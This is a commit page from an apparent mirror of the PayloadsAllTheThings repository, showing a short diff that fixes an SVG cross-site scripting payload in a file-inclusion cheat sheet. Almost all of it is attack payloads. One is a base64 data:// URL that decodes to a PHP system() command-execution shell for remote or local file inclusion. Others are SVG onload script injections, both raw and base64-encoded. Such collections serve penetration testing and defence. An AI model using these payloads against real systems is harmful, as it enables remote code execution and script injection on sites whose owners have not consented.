1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-09-28 15:21:32 +02:00

Fix SVG payload - with a trick :X

This commit is contained in:
swisskyrepo 2016-10-25 00:18:07 +07:00
parent b44215ef6e
commit a9fe14fa29

@ -31,7 +31,8 @@ http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbW
```
XSS via RFI/LFI with "<<svg<>svg onload=alert(1)>onload=alert(1)>" payload
XSS via RFI/LFI with "<<svg<>svg onload=alert(1)>" payload
<svg onload=alert(1)>
```
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
```